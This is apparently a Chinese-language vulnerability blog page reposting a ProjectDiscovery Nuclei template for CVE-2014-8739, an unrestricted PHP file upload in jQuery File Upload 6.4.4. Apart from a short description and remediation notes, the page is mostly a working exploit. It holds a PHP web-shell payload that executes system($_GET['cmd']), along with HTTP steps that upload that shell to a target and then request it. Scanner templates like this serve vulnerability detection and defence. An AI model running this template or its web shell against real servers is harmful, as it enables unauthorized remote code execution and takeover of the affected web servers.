jQuery File Upload 644 - Unrestricted File Upload

漏洞信息

漏洞名称: jQuery File Upload 6.4.4 - Unrestricted File Upload

漏洞编号:

  • CVE: CVE-2014-8739

漏洞类型: 文件上传

漏洞等级: 严重

漏洞描述: jQuery File Upload是一个广泛使用的文件上传插件,支持多文件上传、拖放上传等功能,常用于各种Web应用中。该插件因其易用性和灵活性而被广泛部署于企业级服务和普通Web应用组件中。

该漏洞属于文件上传类型,具体原因是由于server/php/UploadHandler.php文件中缺乏对上传文件类型的有效验证,导致远程攻击者可以上传任意PHP文件。攻击者通过上传带有PHP扩展名的恶意文件,并直接访问该文件,即可执行任意PHP代码。这一漏洞的技术根源在于服务器端未对上传文件的类型和内容进行严格检查,从而允许了危险文件的上传和执行。

成功利用此漏洞可能导致远程代码执行,攻击者可以完全控制受影响的Web应用和服务器。由于无需任何身份验证即可利用,且攻击过程可以自动化进行,因此该漏洞的风险极高。攻击者可以利用此漏洞窃取敏感数据、破坏服务或进一步渗透内网,对企业和用户造成严重的安全威胁。

产品厂商: jquery_file_upload_project

产品名称: jQuery File Upload

影响版本: 6.4.4

来源: https://github.com/projectdiscovery/nuclei-templates/blob/e4e6b3c82e8b071aee880251a4ba0f6ee700207d/http%2Fcves%2F2014%2FCVE-2014-8739.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155

id: CVE-2014-8739

info:
  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
  author: pranjal
  severity: critical
  description: |
    jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
  remediation: |
    - Upgrade to a patched version of jQuery File Upload plugin
    - Implement proper file type validation on the server side
    - Restrict upload directories and file permissions
    - Use whitelist approach for allowed file extensions
  reference:
    - https://www.exploit-db.com/exploits/35057/
    - https://www.exploit-db.com/exploits/36811/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.94326
    epss-percentile: 0.99943
    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: jquery_file_upload_project
    product: jquery_file_upload
    verified: true
  tags: cve,cve2014,edb,file-upload,intrusive,jquery,kev,rce

variables:
  randstr: "{{randstr}}"
  php_payload: |
    <?php
    echo "{{randstr}}";
    if(isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>

http:
  # Step 1: Check if the vulnerable endpoint exists and identify jQuery File Upload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^{\"files\":\s*\[\]'
        part: body

      - type: word
        part: body
        words:
          - "files"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: upload_url
        part: body
        regex:
          - '"url":\s*"([^"]+)"'
          - '"upload_url":\s*"([^"]+)"'

  # Step 2: Attempt to upload a PHP file with specific jQuery File Upload response patterns
  - method: POST
    path:
      - "{{BaseURL}}/server/php/"

    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
      Content-Type: application/x-php

      {{php_payload}}
      ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
        part: body

      - type: word
        part: body
        words:
          - "files"
          - "{{randstr}}"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: uploaded_file
        part: body
        regex:
          - '"name":\s*"([^"]+)"'
          - '"url":\s*"([^"]+)"'

  # Step 3: Verify the uploaded file is accessible and contains our unique payload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/files/{{randstr}}.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_output
        part: body
        regex:
          - '{{randstr}}'

# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件上传
jQuery File Upload 644 - Unrestricted File Upload
http://example.com/2025/07/30/github_919758539/
作者
lianccc
发布于
2025年7月30日
许可协议